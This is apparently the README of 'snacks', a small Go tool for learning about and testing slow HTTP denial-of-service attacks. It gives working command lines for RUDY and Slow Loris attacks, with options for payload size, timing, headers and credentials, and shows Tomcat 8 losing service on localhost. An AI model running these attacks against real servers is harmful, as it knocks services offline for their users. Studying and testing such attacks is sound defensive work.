A small collection of tools for limited testing of common HTTP vulnerabilities.
Goals:
- Learn Go
- Learn about common HTTP attack vectors
go get github.com/andrewflbarnes/snacks
# or
git clone git@github.com:andrewflbarnes/snacks# local build
make
# local install
make installJudy launches a RUDY (r-u-dead-yet) attack using JSON as the content-type over more typical MIME types found in other implementations.
For a full list of options, defaults and what they do
snacks judy -hExample:
snacks judy -size 1000000 -sd 10ms -sb 7 -vv localhost:8888/boomThe above command will
- send 1000000 arbitrary bytes to hold the connection open (not including HTTP POST headers)
- wait 10ms between sending each segment of bytes
- send 7 bytes in every segment (excluding the initial HTTP POST headers)
- set the path to
/boomin the HTTP POST request and send tolocalhost:8888 - enable trace logging
Loris launches a Slow Loris attack by repeatedly sending a duplicate HTTP header every fixed time period.
At the moment this will always send the whole header, a -sb/SendBytes option is not currently available.
For a full list of options, defaults and what they do
snacks loris -hExample:
snacks loris -size 1000000 -sd 1s -header "x-slow: loris" -vv localhost:8888/boomThe above command will
- send 1000000 repeat instances of the header (not most application servers limit the max. number of HTTP headers)
- wait 1s between sending each header
- set the header to be set to
x-slow: loris - set the path to
/boomin the HTTP POST request and send tolocalhost:8888 - enable trace logging
If a specific content-type header is required use the -type flag. e.g.
snacks judy -type application/x-www-form-urlencoded ...For supported content types this will set a default payload prefix which may be overridden with -prefix
To override a payload prefix use the -prefix flag. e.g. for a default JSON content-type (which would otherwise
default to using {"a":" as the payload prefix)
snacks judy -prefix '{"payload":"' ...For custom content-types and prefix apyloads specify both -type and -prefix e.g.
snacks judy -type application/xml -prefix '<payload>' ...
snacks judy -type application/vnd.my.custom.type -prefix '1|string|payload|' ...If authorization is required use either -basic or -bearer flags e.g.
snacks loris -basic tomcat:tomcat ...
snacks judy -bearer 0123456789ABCDEF ...To arbitrarily set headers (inlcuding those which have specific options e.g. -basic and -bearer for Authorization)
use the -headers option. This takes a list of HTTP headers concatenated with double pipes ||. e.g.
snacks judy -headers "Authorization: custom 0123456789||Connection: keep-alive" ...Note: this option is not necessarily useful for slow loris attacks which don't typically allow for headers to be parsed and validated.
Tomcat 8 seems to be particularly susceptible to RUDY attacks in it's default configuration even using the Http11NioProtocol. For example you can hit a management endpoint or an arbitrary path on a springboot webapp:
# first terminal
snacks judy \
-type application/x-www-form-urlencoded \
-basic tomcat:tomcat \
localhost:8888/manager/html/expire
#or
snacks judy \
localhost:8888/mywebapp
# second terminal
while clear; do date; curl localhost:8888 -v; date; sleep 1; doneLoss of service occurs around 200 connections in. Perhaps unsuprisingly this matches with the max number of threads Tomcat is configured to use by default.